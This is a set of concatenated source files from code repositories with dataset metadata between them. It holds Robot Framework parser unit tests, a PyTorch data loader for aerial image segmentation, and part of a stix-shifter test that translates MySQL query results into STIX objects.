                            header=ExceptHeader((Token(Token.EXCEPT, 'EXCEPT', 7, 4),
                                                 Token(Token.AS, 'AS', 7, 14),
                                                 Token(Token.VARIABLE, '${exp}', 7, 20))),
                            body=[KeywordCall((Token(Token.KEYWORD, 'Log', 8, 8),
                                               Token(Token.ARGUMENT, 'Catch', 8, 15)))],
                            next=Try(
                                header=ElseHeader((Token(Token.ELSE, 'ELSE', 9, 4),)),
                                body=[KeywordCall((Token(Token.KEYWORD, 'No operation', 10, 8),))],
                                next=Try(
                                    header=FinallyHeader((Token(Token.FINALLY, 'FINALLY', 11, 4),)),
                                    body=[KeywordCall((Token(Token.KEYWORD, 'Log', 12, 8),
                                                       Token(Token.ARGUMENT, 'finally here!', 12, 15)))]
                                )
                            )
                        )
                    ),
                    end=End([Token(Token.END, 'END', 13, 4)])
                )
                if not data_only:
                    RemoveNonDataTokensVisitor().visit(node)
                assert_model(node, expected)
class TestVariables(unittest.TestCase):
    """Parsing tests for the ``*** Variables ***`` section, valid and invalid."""

    def test_valid(self):
        model = get_model('''\
*** Variables ***
${x}      value
@{y}=     two    values
&{z} =    one=item
''', data_only=True)
        expected = VariableSection(
            header=SectionHeader(
                tokens=[Token(Token.VARIABLE_HEADER, '*** Variables ***', 1, 0)]
            ),
            body=[
                Variable([Token(Token.VARIABLE, '${x}', 2, 0),
                          Token(Token.ARGUMENT, 'value', 2, 10)]),
                Variable([Token(Token.VARIABLE, '@{y}=', 3, 0),
                          Token(Token.ARGUMENT, 'two', 3, 10),
                          Token(Token.ARGUMENT, 'values', 3, 17)]),
                Variable([Token(Token.VARIABLE, '&{z} =', 4, 0),
                          Token(Token.ARGUMENT, 'one=item', 4, 10)]),
            ]
        )
        assert_model(model.sections[0], expected)

    def test_invalid(self):
        # Each malformed variable gets a node with an ``errors`` tuple.
        model = get_model('''\
*** Variables ***
Ooops     I did it again
${}       invalid
${x}==    invalid
${not     closed
          invalid
&{dict}   invalid    ${invalid}
''', data_only=True)
        expected = VariableSection(
            header=SectionHeader(
                tokens=[Token(Token.VARIABLE_HEADER, '*** Variables ***', 1, 0)]
            ),
            body=[
                Variable(
                    tokens=[Token(Token.VARIABLE, 'Ooops', 2, 0),
                            Token(Token.ARGUMENT, 'I did it again', 2, 10)],
                    errors=("Invalid variable name 'Ooops'.",)
                ),
                Variable(
                    tokens=[Token(Token.VARIABLE, '${}', 3, 0),
                            Token(Token.ARGUMENT, 'invalid', 3, 10)],
                    errors=("Invalid variable name '${}'.",)
                ),
                Variable(
                    tokens=[Token(Token.VARIABLE, '${x}==', 4, 0),
                            Token(Token.ARGUMENT, 'invalid', 4, 10)],
                    errors=("Invalid variable name '${x}=='.",)
                ),
                Variable(
                    tokens=[Token(Token.VARIABLE, '${not', 5, 0),
                            Token(Token.ARGUMENT, 'closed', 5, 10)],
                    errors=("Invalid variable name '${not'.",)
                ),
                Variable(
                    tokens=[Token(Token.VARIABLE, '', 6, 0),
                            Token(Token.ARGUMENT, 'invalid', 6, 10)],
                    errors=("Invalid variable name ''.",)
                ),
                Variable(
                    tokens=[Token(Token.VARIABLE, '&{dict}', 7, 0),
                            Token(Token.ARGUMENT, 'invalid', 7, 10),
                            Token(Token.ARGUMENT, '${invalid}', 7, 21)],
                    errors=("Invalid dictionary variable item 'invalid'. "
                            "Items must use 'name=value' syntax or be dictionary variables themselves.",
                            "Invalid dictionary variable item '${invalid}'. "
                            "Items must use 'name=value' syntax or be dictionary variables themselves.")
                ),
            ]
        )
        assert_model(model.sections[0], expected)
class TestKeyword(unittest.TestCase):
    """Parsing tests for user keyword definitions."""

    def test_invalid_arg_spec(self):
        # Several argument-spec violations on one [Arguments] row: invalid
        # syntax, ordering, duplicate varargs, and kwargs not being last.
        model = get_model('''\
*** Keywords ***
Invalid
    [Arguments]    ooops    ${optional}=default    ${required}
    ...    @{too}    @{many}    &{notlast}    ${x}
''', data_only=True)
        expected = KeywordSection(
            header=SectionHeader(
                tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
            ),
            body=[
                Keyword(
                    header=KeywordName(
                        tokens=[Token(Token.KEYWORD_NAME, 'Invalid', 2, 0)]
                    ),
                    body=[
                        Arguments(
                            tokens=[Token(Token.ARGUMENTS, '[Arguments]', 3, 4),
                                    Token(Token.ARGUMENT, 'ooops', 3, 19),
                                    Token(Token.ARGUMENT, '${optional}=default', 3, 28),
                                    Token(Token.ARGUMENT, '${required}', 3, 51),
                                    Token(Token.ARGUMENT, '@{too}', 4, 11),
                                    Token(Token.ARGUMENT, '@{many}', 4, 21),
                                    Token(Token.ARGUMENT, '&{notlast}', 4, 32),
                                    Token(Token.ARGUMENT, '${x}', 4, 46)],
                            errors=("Invalid argument syntax 'ooops'.",
                                    'Non-default argument after default arguments.',
                                    'Cannot have multiple varargs.',
                                    'Only last argument can be kwargs.')
                        )
                    ],
                )
            ]
        )
        assert_model(model.sections[0], expected)
class TestControlStatements(unittest.TestCase):
    """Parsing tests for RETURN, BREAK and CONTINUE control statements.

    Each test also verifies that a keyword named like the statement
    (e.g. ``Return``) is still parsed as a normal keyword call.
    """

    def test_return(self):
        model = get_model('''\
*** Keywords ***
Name
    Return    RETURN
    RETURN    RETURN
''', data_only=True)
        expected = KeywordSection(
            header=SectionHeader(
                tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
            ),
            body=[
                Keyword(
                    header=KeywordName(
                        tokens=[Token(Token.KEYWORD_NAME, 'Name', 2, 0)]
                    ),
                    body=[
                        KeywordCall([Token(Token.KEYWORD, 'Return', 3, 4),
                                     Token(Token.ARGUMENT, 'RETURN', 3, 14)]),
                        ReturnStatement([Token(Token.RETURN_STATEMENT, 'RETURN', 4, 4),
                                         Token(Token.ARGUMENT, 'RETURN', 4, 14)])
                    ],
                )
            ]
        )
        assert_model(model.sections[0], expected)

    def test_break(self):
        model = get_model('''\
*** Keywords ***
Name
    WHILE    True
        Break    BREAK
        BREAK
    END
''', data_only=True)
        expected = KeywordSection(
            header=SectionHeader(
                tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
            ),
            body=[
                Keyword(
                    header=KeywordName(
                        tokens=[Token(Token.KEYWORD_NAME, 'Name', 2, 0)]
                    ),
                    body=[
                        While(
                            header=WhileHeader([Token(Token.WHILE, 'WHILE', 3, 4),
                                                Token(Token.ARGUMENT, 'True', 3, 13)]),
                            body=[KeywordCall([Token(Token.KEYWORD, 'Break', 4, 8),
                                               Token(Token.ARGUMENT, 'BREAK', 4, 17)]),
                                  Break([Token(Token.BREAK, 'BREAK', 5, 8)])],
                            end=End([Token(Token.END, 'END', 6, 4)])
                        )
                    ],
                )
            ]
        )
        assert_model(model.sections[0], expected)

    def test_continue(self):
        model = get_model('''\
*** Keywords ***
Name
    FOR    ${x}    IN    @{stuff}
        Continue    CONTINUE
        CONTINUE
    END
''', data_only=True)
        expected = KeywordSection(
            header=SectionHeader(
                tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
            ),
            body=[
                Keyword(
                    header=KeywordName(
                        tokens=[Token(Token.KEYWORD_NAME, 'Name', 2, 0)]
                    ),
                    body=[
                        For(
                            header=ForHeader([Token(Token.FOR, 'FOR', 3, 4),
                                              Token(Token.VARIABLE, '${x}', 3, 11),
                                              Token(Token.FOR_SEPARATOR, 'IN', 3, 19),
                                              Token(Token.ARGUMENT, '@{stuff}', 3, 25)]),
                            body=[KeywordCall([Token(Token.KEYWORD, 'Continue', 4, 8),
                                               Token(Token.ARGUMENT, 'CONTINUE', 4, 20)]),
                                  Continue([Token(Token.CONTINUE, 'CONTINUE', 5, 8)])],
                            end=End([Token(Token.END, 'END', 6, 4)])
                        )
                    ],
                )
            ]
        )
        assert_model(model.sections[0], expected)
class TestError(unittest.TestCase):
    """Tests for the Error node: error collection from tokens and in models."""

    def test_get_errors_from_tokens(self):
        assert_equal(Error([Token('ERROR', error='xxx')]).errors,
                     ('xxx',))
        assert_equal(Error([Token('ERROR', error='xxx'),
                            Token('ARGUMENT'),
                            Token('ERROR', error='yyy')]).errors,
                     ('xxx', 'yyy'))
        assert_equal(Error([Token('ERROR', error=e) for e in '0123456789']).errors,
                     tuple('0123456789'))

    def test_get_fatal_errors_from_tokens(self):
        assert_equal(Error([Token('FATAL ERROR', error='xxx')]).errors,
                     ('xxx',))
        assert_equal(Error([Token('FATAL ERROR', error='xxx'),
                            Token('ARGUMENT'),
                            Token('FATAL ERROR', error='yyy')]).errors,
                     ('xxx', 'yyy'))
        assert_equal(Error([Token('FATAL ERROR', error=e) for e in '0123456789']).errors,
                     tuple('0123456789'))

    def test_get_errors_and_fatal_errors_from_tokens(self):
        assert_equal(Error([Token('ERROR', error='error'),
                            Token('ARGUMENT'),
                            Token('FATAL ERROR', error='fatal error')]).errors,
                     ('error', 'fatal error'))
        assert_equal(Error([Token('FATAL ERROR', error=e) for e in '0123456789']).errors,
                     tuple('0123456789'))

    def test_model_error(self):
        model = get_model('''\
*** Invalid ***
*** Settings ***
Invalid
Documentation
''', data_only=True)
        inv_header = (
            "Unrecognized section header '*** Invalid ***'. Valid sections: "
            "'Settings', 'Variables', 'Test Cases', 'Tasks', 'Keywords' and 'Comments'."
        )
        inv_setting = "Non-existing setting 'Invalid'."
        expected = File([
            CommentSection(
                body=[
                    Error([Token('ERROR', '*** Invalid ***', 1, 0, inv_header)])
                ]
            ),
            SettingSection(
                header=SectionHeader([
                    Token('SETTING HEADER', '*** Settings ***', 2, 0)
                ]),
                body=[
                    Error([Token('ERROR', 'Invalid', 3, 0, inv_setting)]),
                    Documentation([Token('DOCUMENTATION', 'Documentation', 4, 0)])
                ]
            )
        ])
        assert_model(model, expected)

    def test_model_error_with_fatal_error(self):
        # Resource files must not contain test cases; this is a fatal error.
        model = get_resource_model('''\
*** Test Cases ***
''', data_only=True)
        inv_testcases = "Resource file with 'Test Cases' section is invalid."
        expected = File([
            CommentSection(
                body=[
                    Error([Token('FATAL ERROR', '*** Test Cases ***', 1, 0, inv_testcases)])
                ]
            )
        ])
        assert_model(model, expected)

    def test_model_error_with_error_and_fatal_error(self):
        model = get_resource_model('''\
*** Invalid ***
*** Settings ***
Invalid
Documentation
*** Test Cases ***
''', data_only=True)
        inv_header = (
            "Unrecognized section header '*** Invalid ***'. Valid sections: "
            "'Settings', 'Variables', 'Keywords' and 'Comments'."
        )
        inv_setting = "Non-existing setting 'Invalid'."
        inv_testcases = "Resource file with 'Test Cases' section is invalid."
        expected = File([
            CommentSection(
                body=[
                    Error([Token('ERROR', '*** Invalid ***', 1, 0, inv_header)])
                ]
            ),
            SettingSection(
                header=SectionHeader([
                    Token('SETTING HEADER', '*** Settings ***', 2, 0)
                ]),
                body=[
                    Error([Token('ERROR', 'Invalid', 3, 0, inv_setting)]),
                    Documentation([Token('DOCUMENTATION', 'Documentation', 4, 0)]),
                    Error([Token('FATAL ERROR', '*** Test Cases ***', 5, 0, inv_testcases)])
                ]
            )
        ])
        assert_model(model, expected)

    def test_set_errors_explicitly(self):
        # Explicitly set errors are kept and appended after token-derived ones.
        error = Error([])
        error.errors = ('explicitly set', 'errors')
        assert_equal(error.errors, ('explicitly set', 'errors'))
        error.tokens = [Token('ERROR', error='normal error'),
                        Token('FATAL ERROR', error='fatal error')]
        assert_equal(error.errors, ('normal error', 'fatal error',
                                    'explicitly set', 'errors'))
        error.errors = ['errors', 'as', 'list']
        assert_equal(error.errors, ('normal error', 'fatal error',
                                    'errors', 'as', 'list'))
class TestModelVisitors(unittest.TestCase):
    """Tests for visiting and transforming models with ast and RF visitor APIs.

    ``ast.NodeVisitor``/``ast.NodeTransformer`` must not dispatch to the
    generic ``visit_Block``/``visit_Statement`` hooks, while the Robot
    Framework ``ModelVisitor``/``ModelTransformer`` must.
    """

    def test_ast_NodeVisitor(self):
        class Visitor(ast.NodeVisitor):

            def __init__(self):
                self.test_names = []
                self.kw_names = []

            def visit_TestCaseName(self, node):
                self.test_names.append(node.name)

            def visit_KeywordName(self, node):
                self.kw_names.append(node.name)

            def visit_Block(self, node):
                raise RuntimeError('Should not be executed.')

            def visit_Statement(self, node):
                raise RuntimeError('Should not be executed.')

        visitor = Visitor()
        visitor.visit(get_model(DATA))
        assert_equal(visitor.test_names, ['Example'])
        assert_equal(visitor.kw_names, ['Keyword'])

    def test_ModelVisitor(self):
        class Visitor(ModelVisitor):

            def __init__(self):
                self.test_names = []
                self.kw_names = []
                self.blocks = []
                self.statements = []

            def visit_TestCaseName(self, node):
                self.test_names.append(node.name)
                self.visit_Statement(node)

            def visit_KeywordName(self, node):
                self.kw_names.append(node.name)
                self.visit_Statement(node)

            def visit_Block(self, node):
                self.blocks.append(type(node).__name__)
                self.generic_visit(node)

            def visit_Statement(self, node):
                self.statements.append(node.type)

        visitor = Visitor()
        visitor.visit(get_model(DATA))
        assert_equal(visitor.test_names, ['Example'])
        assert_equal(visitor.kw_names, ['Keyword'])
        assert_equal(visitor.blocks,
                     ['File', 'CommentSection', 'TestCaseSection', 'TestCase',
                      'KeywordSection', 'Keyword'])
        assert_equal(visitor.statements,
                     ['EOL', 'TESTCASE HEADER', 'EOL', 'TESTCASE NAME',
                      'COMMENT', 'KEYWORD', 'EOL', 'EOL', 'KEYWORD HEADER',
                      'COMMENT', 'KEYWORD NAME', 'ARGUMENTS', 'KEYWORD',
                      'RETURN STATEMENT'])

    def test_ast_NodeTransformer(self):
        class Transformer(ast.NodeTransformer):

            def visit_Tags(self, node):
                # Returning None removes the node from the model.
                return None

            def visit_TestCaseSection(self, node):
                self.generic_visit(node)
                node.body.append(
                    TestCase(TestCaseName([Token('TESTCASE NAME', 'Added'),
                                           Token('EOL', '\n')]))
                )
                return node

            def visit_TestCase(self, node):
                self.generic_visit(node)
                return node if node.name != 'REMOVE' else None

            def visit_TestCaseName(self, node):
                name_token = node.get_token(Token.TESTCASE_NAME)
                name_token.value = name_token.value.upper()
                return node

            def visit_Block(self, node):
                raise RuntimeError('Should not be executed.')

            def visit_Statement(self, node):
                raise RuntimeError('Should not be executed.')

        model = get_model('''\
*** Test Cases ***
Example
    [Tags]    to be removed
Remove
''')
        Transformer().visit(model)
        expected = File(sections=[
            TestCaseSection(
                header=SectionHeader([
                    Token('TESTCASE HEADER', '*** Test Cases ***', 1, 0),
                    Token('EOL', '\n', 1, 18)
                ]),
                body=[
                    TestCase(TestCaseName([
                        Token('TESTCASE NAME', 'EXAMPLE', 2, 0),
                        Token('EOL', '\n', 2, 7)
                    ])),
                    TestCase(TestCaseName([
                        Token('TESTCASE NAME', 'Added'),
                        Token('EOL', '\n')
                    ]))
                ]
            )
        ])
        assert_model(model, expected)

    def test_ModelTransformer(self):
        class Transformer(ModelTransformer):

            def visit_SectionHeader(self, node):
                return node

            def visit_TestCaseName(self, node):
                return node

            def visit_Statement(self, node):
                return None

            def visit_Block(self, node):
                self.generic_visit(node)
                if hasattr(node, 'header'):
                    for token in node.header.data_tokens:
                        token.value = token.value.upper()
                return node

        model = get_model('''\
*** Test Cases ***
Example
    [Tags]    to be removed
    To be removed
''')
        Transformer().visit(model)
        expected = File(sections=[
            TestCaseSection(
                header=SectionHeader([
                    Token('TESTCASE HEADER', '*** TEST CASES ***', 1, 0),
                    Token('EOL', '\n', 1, 18)
                ]),
                body=[
                    TestCase(TestCaseName([
                        Token('TESTCASE NAME', 'EXAMPLE', 2, 0),
                        Token('EOL', '\n', 2, 7)
                    ])),
                ]
            )
        ])
        assert_model(model, expected)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| 35.728027
| 104
| 0.446203
|
4a0215edc6965fd1142bed1a86ecdc21b342314e
| 3,119
|
py
|
Python
|
src/models/data_factory.py
|
vinodrajendran001/aerial_segmentation
|
44ce909fe1f6f218930c50825ce7452c8029b20f
|
[
"FTL"
] | null | null | null |
src/models/data_factory.py
|
vinodrajendran001/aerial_segmentation
|
44ce909fe1f6f218930c50825ce7452c8029b20f
|
[
"FTL"
] | 10
|
2021-03-30T14:17:16.000Z
|
2022-03-12T00:50:30.000Z
|
src/models/data_factory.py
|
vinodrajendran001/aerial_segmentation
|
44ce909fe1f6f218930c50825ce7452c8029b20f
|
[
"FTL"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import numpy as np
from torch.utils.data import Dataset
from skimage import transform as sk_transform
from skimage.io import imread
import os
from glob import glob
# NOTE(review): this class shadows the imported torch.utils.data.Dataset
# name; it still subclasses the torch class because the base is resolved
# before the new name is bound. Consider renaming to avoid confusion.
class Dataset(Dataset):
    """Paired aerial image / segmentation label dataset read from PNG files.

    Images and labels are matched by sorted filename order — assumes the two
    directories contain corresponding files (TODO confirm).
    """

    def __init__(self, split_file_image, split_file_label, using_onehot):
        # Directories containing input images and color-coded label images.
        self.split_file_image = sorted(glob(split_file_image + "/*.png"))
        self.split_file_label = sorted(glob(split_file_label + "/*.png"))
        # If False, __getitem__ collapses the one-hot labels to class indices.
        self.using_onehot = using_onehot

    def __len__(self):
        return len(self.split_file_image)

    def __getitem__(self, idx):
        # Reading aerial image
        img_name = self.split_file_image[idx]
        # Normalize pixel values to [0, 1].
        image_single = imread(img_name)/ 255.0
        label_name = self.split_file_label[idx]
        label_single = imread(label_name)
        # splitting label
        # Converting labels to one-hot
        # Reuses the image array shape; assumes a 3-channel (RGB) image — TODO confirm.
        label_one_hot = 0.0 * image_single
        # building channel 0: labelled red (R==255, B==0)
        label_one_hot[:, :, 0] = 1 * (
            np.logical_and(np.equal(label_single[:, :, 0], 255), np.equal(label_single[:, :, 2], 0)))
        # road channel 1: labelled blue (R==0, B==255)
        label_one_hot[:, :, 1] = 1 * (
            np.logical_and(np.equal(label_single[:, :, 0], 255), np.equal(label_single[:, :, 1], 255)))
        label_one_hot[:, :, 2] = 1 * np.logical_and(label_one_hot[:, :, 2], np.equal(label_single[:, :, 2], 255))
        '''
        # fixing some noisy, left-out pixels, assigning them to BG . These are the ones ==0 in all 3 channels
        all_zeros = np.logical_and(np.equal(label_one_hot[:, :, 0], 0), np.equal(label_one_hot[:, :, 1], 0))
        all_zeros = np.logical_and(all_zeros, np.equal(label_one_hot[:, :, 2], 0))
        # add these noisy pixels to background
        label_one_hot[:, :, 2] += 1 * all_zeros
        '''
        if not self.using_onehot:
            # Convert one-hot encoding to a 2-D class-index map.
            label_one_hot = np.argmax(label_one_hot, 2)
        return image_single, label_one_hot
def get_dataset(mode, config):
    """Build a DataLoader over the processed dataset for the given split.

    Args:
        mode: Either ``'train'`` or ``'test'``; selects the data subdirectory.
        config: Dict with a ``'train'`` section providing ``batch_size``,
            ``shuffle`` and ``num_workers`` for the DataLoader.

    Returns:
        A ``torch.utils.data.DataLoader`` yielding (image, label) batches.

    Raises:
        ValueError: If ``mode`` is not a recognized split name.
    """
    # Validate the mode up front; both valid modes use identical path logic,
    # so the previously duplicated train/test branches are collapsed.
    if mode not in ('train', 'test'):
        raise ValueError("Mode {} is unknown".format(mode))
    # Project root: three directories above this file (src/models/ -> root).
    data_folder = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
    split_file_image = os.path.join(data_folder, 'data', 'processed', mode, 'images')
    split_file_label = os.path.join(data_folder, 'data', 'processed', mode, 'labels')
    ds = Dataset(split_file_image, split_file_label, using_onehot=False)
    # preparing pytorch data loader
    ds_final = torch.utils.data.DataLoader(ds, batch_size=config['train']['batch_size'], shuffle=config['train']['shuffle'], num_workers=config['train']['num_workers'])
    return ds_final
| 35.443182
| 168
| 0.632895
|
4a02161285b197d286382d74ede48a738f6d153e
| 14,158
|
py
|
Python
|
tests/stix_translation/test_results_translation.py
|
priti-patil/stix-shifter
|
26954598fb79dde4506987388592ec391ff8a10b
|
[
"Apache-2.0"
] | 33
|
2018-05-25T17:07:28.000Z
|
2019-09-30T10:08:53.000Z
|
tests/stix_translation/test_results_translation.py
|
priti-patil/stix-shifter
|
26954598fb79dde4506987388592ec391ff8a10b
|
[
"Apache-2.0"
] | 54
|
2018-06-01T18:17:24.000Z
|
2019-09-30T18:36:15.000Z
|
tests/stix_translation/test_results_translation.py
|
subbyte/stix-shifter
|
36d71c172a5fc5b97d872e623753b0dd1bf4fe6c
|
[
"Apache-2.0"
] | 37
|
2018-07-24T13:29:46.000Z
|
2019-09-29T19:06:27.000Z
|
from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator
from stix_shifter_modules.mysql.entry_point import EntryPoint
from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers
import json
# Translation module under test and shared fixtures for the result tests.
MODULE = 'mysql'
RESULTS = 'results'
TRANSFORMERS = get_module_transformers(MODULE)
# Same instant expressed as epoch milliseconds and as a STIX timestamp.
EPOCH = 1634657528000
TIMESTAMP = "2021-10-19T15:32:08.000Z"
# STIX identity object representing the data source of the observed data.
DATA_SOURCE = {
    "type": "identity",
    "id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3",
    "name": "MySQL",
    "identity_class": "events"
}
# One raw event row as it would come back from the MySQL connector.
DATA = {
    "source_ipaddr": "0.0.0.0",
    "dest_ipaddr": "255.255.255.1",
    "url": "https://example.com",
    "username": "someuserid2018",
    "protocol": 'tcp',
    "source_port": 3000,
    "dest_port": 2000,
    "filename": "somefile.exe",
    "sha256hash": "sha256_hash",
    "md5hash": "md5_hash",
    "file_path": "C:/some/path/",
    "file_created_time": EPOCH,
    "file_modified_time": EPOCH,
    "file_accessed_time": EPOCH,
    "directory_created_time": EPOCH,
    "directory_modified_time": EPOCH,
    "directory_accessed_time": EPOCH,
    "process_id": 12345,
    "process_name": "file executed",
    "process_arguments": "some args",
    "process_created_time": EPOCH
}
# Expected deterministic STIX 2.1 object ids for objects derived from DATA.
CYBOX_ID = {
    "source-ipv4-addr": "ipv4-addr--0b6a89e3-e345-51b7-a8ee-aaff7ebf2df5",
    "dest-ipv4-addr": "ipv4-addr--cb8e152d-60f0-596a-81e4-a22cc4a7f063",
    "url": "url--8265905f-c609-52e3-ae52-6681bcd6086d",
    "user-account": "user-account--3cd7ffc9-89f7-5b58-948c-117ec9b3e22a",
    "network-traffic": "network-traffic--2ec70516-29b5-59f3-9743-3b93e97db6d8",
    "file": "file--243f1b5f-0391-501c-bed0-17e9f204f1d2",
    "directory": "directory--9ce39e76-d59e-5db2-8f0e-2001f689ea9d"
}
OPTIONS = {}
class TestTransform(object):
@staticmethod
def get_first(itr, constraint):
return next(
(obj for obj in itr if constraint(obj)),
None
)
@staticmethod
def get_first_of_type(itr, typ):
return TestTransform.get_first(itr, lambda o: type(o) == dict and o.get('type') == typ)
@staticmethod
def get_first_cybox_of_type_stix_2_1(itr, type):
for obj in itr:
if obj["type"] == type:
return obj
@staticmethod
def get_first_cybox_of_id_stix_2_1(itr, id):
for obj in itr:
if obj["id"] == id:
return obj
@staticmethod
def get_object_keys(objects):
for k, v in objects.items():
if k == 'type':
yield v
elif isinstance(v, dict):
for id_val in TestTransform.get_object_keys(v):
yield id_val
def test_common_prop(self):
DATA = {"entry_time": EPOCH, "entry_time": EPOCH, "eventcount": 1}
entry_point = EntryPoint()
result_bundle = entry_point.translate_results(json.dumps(DATA_SOURCE), json.dumps([DATA]))
assert result_bundle['type'] == 'bundle'
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == DATA_SOURCE['type']
assert result_bundle_identity['id'] == DATA_SOURCE['id']
assert result_bundle_identity['name'] == DATA_SOURCE['name']
assert result_bundle_identity['identity_class'] == DATA_SOURCE['identity_class']
observed_data = result_bundle_objects[1]
assert observed_data['id']
assert observed_data['type'] == "observed-data"
assert observed_data['created_by_ref'] == result_bundle_identity['id']
assert observed_data['number_observed'] == 1
assert observed_data['created']
assert observed_data['modified']
assert observed_data['first_observed']
assert observed_data['last_observed']
    def test_STIX_2_0_cybox_observables(self):
        """Every mapped cyber observable should appear in the 2.0 'objects' dict."""
        entry_point = EntryPoint()
        result_bundle = entry_point.translate_results(json.dumps(DATA_SOURCE), json.dumps([DATA]))
        assert result_bundle['type'] == 'bundle'
        # 2.0 bundles carry spec_version at the bundle level
        assert "spec_version" in result_bundle
        assert result_bundle['spec_version'] == '2.0'
        result_bundle_objects = result_bundle['objects']
        observed_data = result_bundle_objects[1]
        assert 'objects' in observed_data
        objects = observed_data['objects']
        # network-traffic
        stix_object = TestTransform.get_first_of_type(objects.values(), 'network-traffic')
        assert stix_object, 'network-traffic object type not found'
        assert "src_ref" in stix_object
        assert "dst_ref" in stix_object
        assert "src_port" in stix_object and stix_object['src_port'] == 3000
        assert "dst_port" in stix_object and stix_object['dst_port'] == 2000
        assert "protocols" in stix_object and stix_object['protocols'] == ['tcp']
        # destination ipv4-addr
        ip_ref = stix_object['dst_ref']
        assert ip_ref in objects, f"dst_ref with key {stix_object['dst_ref']} not found"
        ip_obj = objects[ip_ref]
        assert "type" in ip_obj and ip_obj['type'] == 'ipv4-addr'
        assert "value" in ip_obj and ip_obj['value'] == DATA["dest_ipaddr"]
        # source ipv4-addr
        ip_ref = stix_object['src_ref']
        assert ip_ref in objects, f"src_ref with key {stix_object['src_ref']} not found"
        ip_obj = objects[ip_ref]
        assert "type" in ip_obj and ip_obj['type'] == 'ipv4-addr'
        assert "value" in ip_obj and ip_obj['value'] == DATA["source_ipaddr"]
        # url
        stix_object = TestTransform.get_first_of_type(objects.values(), 'url')
        assert stix_object, 'url object type not found'
        assert "value" in stix_object and stix_object['value'] == DATA['url']
        # user-account
        stix_object = TestTransform.get_first_of_type(objects.values(), 'user-account')
        assert stix_object, 'user-account object type not found'
        assert "user_id" in stix_object and stix_object['user_id'] == DATA['username']
        # file
        file_object = TestTransform.get_first_of_type(objects.values(), 'file')
        assert file_object, 'file object type not found'
        assert "name" in file_object and file_object['name'] == DATA['filename']
        # 2.0 uses created/modified/accessed; the 2.1 test below expects the
        # renamed ctime/mtime/atime properties instead
        assert "created" in file_object and file_object['created'] == TIMESTAMP
        assert "ctime" not in file_object
        assert "modified" in file_object and file_object['modified'] == TIMESTAMP
        assert "mtime" not in file_object
        assert "accessed" in file_object and file_object['accessed'] == TIMESTAMP
        assert "atime" not in file_object
        assert "parent_directory_ref" in file_object
        assert "hashes" in file_object
        hashes = file_object["hashes"]
        assert "MD5" in hashes and hashes["MD5"] == DATA["md5hash"]
        assert "SHA-256" in hashes and hashes["SHA-256"] == DATA["sha256hash"]
        directory_ref = file_object['parent_directory_ref']
        assert directory_ref in objects, f"dst_ref with key {file_object['parent_directory_ref']} not found"
        # directory
        directory_object = TestTransform.get_first_of_type(objects.values(), 'directory')
        assert directory_object, 'directory object type not found'
        assert "path" in directory_object and directory_object["path"] == DATA["file_path"]
        assert "created" in directory_object and directory_object['created'] == TIMESTAMP
        assert "ctime" not in directory_object
        assert "modified" in directory_object and directory_object['modified'] == TIMESTAMP
        assert "mtime" not in directory_object
        assert "accessed" in directory_object and directory_object['accessed'] == TIMESTAMP
        assert "atime" not in directory_object
        # process
        process_object = TestTransform.get_first_of_type(objects.values(), 'process')
        assert process_object, 'process object type not found'
        assert "name" in process_object and process_object['name'] == DATA['process_name']
        assert "pid" in process_object and process_object['pid'] == DATA['process_id']
        assert "arguments" in process_object and process_object['arguments'] == DATA['process_arguments']
        assert "created" in process_object and process_object['created'] == TIMESTAMP
        assert "binary_ref" in process_object
        assert "image_ref" not in process_object
def test_STIX_2_1_cybox_observables(self):
options = {
"stix_2.1": True
}
entry_point = EntryPoint(options=options)
result_bundle = entry_point.translate_results(json.dumps(DATA_SOURCE), json.dumps([DATA]))
assert result_bundle['type'] == 'bundle'
assert "spec_version" not in result_bundle
result_bundle_objects = result_bundle['objects']
observed_data = result_bundle_objects[1]
assert 'objects' not in observed_data
# network-traffic
network_traffic_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'network-traffic')
assert network_traffic_object, 'network-traffic object type not found'
assert "src_ref" in network_traffic_object
assert "dst_ref" in network_traffic_object
assert "src_port" in network_traffic_object and network_traffic_object['src_port'] == 3000
assert "dst_port" in network_traffic_object and network_traffic_object['dst_port'] == 2000
assert "protocols" in network_traffic_object and network_traffic_object['protocols'] == ['tcp']
assert "id" in network_traffic_object and str(network_traffic_object['id']) == CYBOX_ID["network-traffic"]
# destination ipv4-addr
destination_ipv4_object = TestTransform.get_first_cybox_of_id_stix_2_1(result_bundle_objects, network_traffic_object["dst_ref"])
assert "type" in destination_ipv4_object and destination_ipv4_object['type'] == 'ipv4-addr'
assert "value" in destination_ipv4_object and destination_ipv4_object['value'] == DATA["dest_ipaddr"]
assert "id" in destination_ipv4_object and str(destination_ipv4_object['id']) == CYBOX_ID["dest-ipv4-addr"]
# source ipv4-addr
source_ipv4_object = TestTransform.get_first_cybox_of_id_stix_2_1(result_bundle_objects, network_traffic_object["src_ref"])
assert "type" in source_ipv4_object and source_ipv4_object['type'] == 'ipv4-addr'
assert "value" in source_ipv4_object and source_ipv4_object['value'] == DATA["source_ipaddr"]
assert "id" in source_ipv4_object and str(source_ipv4_object['id']) == CYBOX_ID["source-ipv4-addr"]
# url
url_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'url')
assert url_object, 'url object type not found'
assert "value" in url_object and url_object['value'] == DATA['url']
assert "id" in url_object and str(url_object['id']) == CYBOX_ID["url"]
# user-account
user_account_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'user-account')
assert user_account_object, 'user-account object type not found'
assert "user_id" in user_account_object and user_account_object['user_id'] == DATA['username']
assert "id" in user_account_object and str(user_account_object['id']) == CYBOX_ID["user-account"]
# file
file_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'file')
assert file_object, 'file object type not found'
assert "name" in file_object and file_object['name'] == DATA['filename']
